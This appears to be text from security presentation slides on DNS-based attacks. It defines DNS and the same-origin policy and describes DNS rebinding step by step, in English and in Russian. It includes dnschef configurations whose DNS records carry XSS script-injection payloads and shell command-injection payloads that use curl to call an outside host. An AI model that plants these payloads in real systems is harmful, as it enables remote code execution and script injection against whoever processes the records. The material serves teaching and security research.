3. What is DNS?
The Domain Name System (DNS) is a
hierarchical decentralized naming system for
computers, services, or any resource
connected to the Internet or a private network.
It associates various information with domain
names assigned to each of the participating
entities. Most prominently, it translates more
readily memorized domain names to the
numerical IP addresses needed for the
purpose of locating and identifying computer
services and devices with the underlying
network protocols. By providing a worldwide,
distributed directory service, the Domain Name
System is an essential component of the
functionality of the Internet.
11. What is SOP?
In computing, the same-origin policy is an
important concept in the web application
security model. Under the policy, a web
browser permits scripts contained in a first
web page to access data in a second web
page, but only if both web pages have the
same origin. An origin is defined as a
combination of URI scheme, hostname,
and port number. This policy prevents a
malicious script on one page from
obtaining access to sensitive data on
another web page through that page's
Document Object Model.
14. https://crypto.stanford.edu/dns/dns-rebinding.pdf
https://www.ptsecurity.com/download/DNS-rebinding.pdf
The resulting attack consists of the following steps:
1. The victim addresses the dns.evil.xxx domain.
2. The attacker’s DNS server returns both IP addresses in the fixed order.
3. The browser redirects the request to the server at the external 97.246.251.93 IP address.
4. The server returns an HTML page containing JavaScript.
5. After the browser downloads the page, the client’s JavaScript sends a request to the dns.evil.xxx domain.
6. After the request is received, the server script blocks the incoming connections with the victim’s IP address.
7. After a while, the client’s script re-addresses the dns.attacker.ru domain. Since the server returns RTS from the
97.246.251.93 IP address, the request is redirected to the local server at 192.168.0.1.
Now the JavaScript is able to send any GET/POST/HEAD requests to an application at 97.246.251.93, as well as
process the received responses and send the results to the attacker..
26. Dnschef
[NS] # Queries for mail server records
*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?ns></script>
[MX] # Queries for mail server records
*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?cname></script>
[CNAME] # Queries for alias records
*.xss.hack.bo0om.ru="-->'></script><script/src=//hi.bo0om.ru/js/?cname></script>
http://thesprawl.org/projects/dnschef/
34. Dnschef
[NS] # Queries for mail server records
*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl
https://hi.bo0om.ru/?rce&'"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'
[MX] # Queries for mail server records
*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl
https://hi.bo0om.ru/?rce&'"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'
[CNAME] # Queries for alias records
*.rce.hack.bo0om.ru=&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl
https://hi.bo0om.ru/?rce&'"`0&$(curl${IFS}https://hi.bo0om.ru/?rce)&curl https://hi.bo0om.ru/?rce&`'
1. Жертва обращается к домену, принадлежащему злоумышленнику.
2. Получает с DNS-сервера IP-адрес, соответствующий доменному имени.
3. Обращается на веб-сервер, соответствующий полученному IP, и получает с
него сценарий JavaScript.
4. Полученный JavaScript через некоторое время после загрузки инициирует
повторный запрос на сервер.
5. В этот момент атакующий с помощью межсетевого экрана блокирует все
запросы жертвы к серверу.
6. Браузер пытается повторно узнать IP-адрес сервера, послав
соответствующий DNS-запрос, и на этот раз получает IP-адрес уязвимого сервера
из локальной сети жертвы.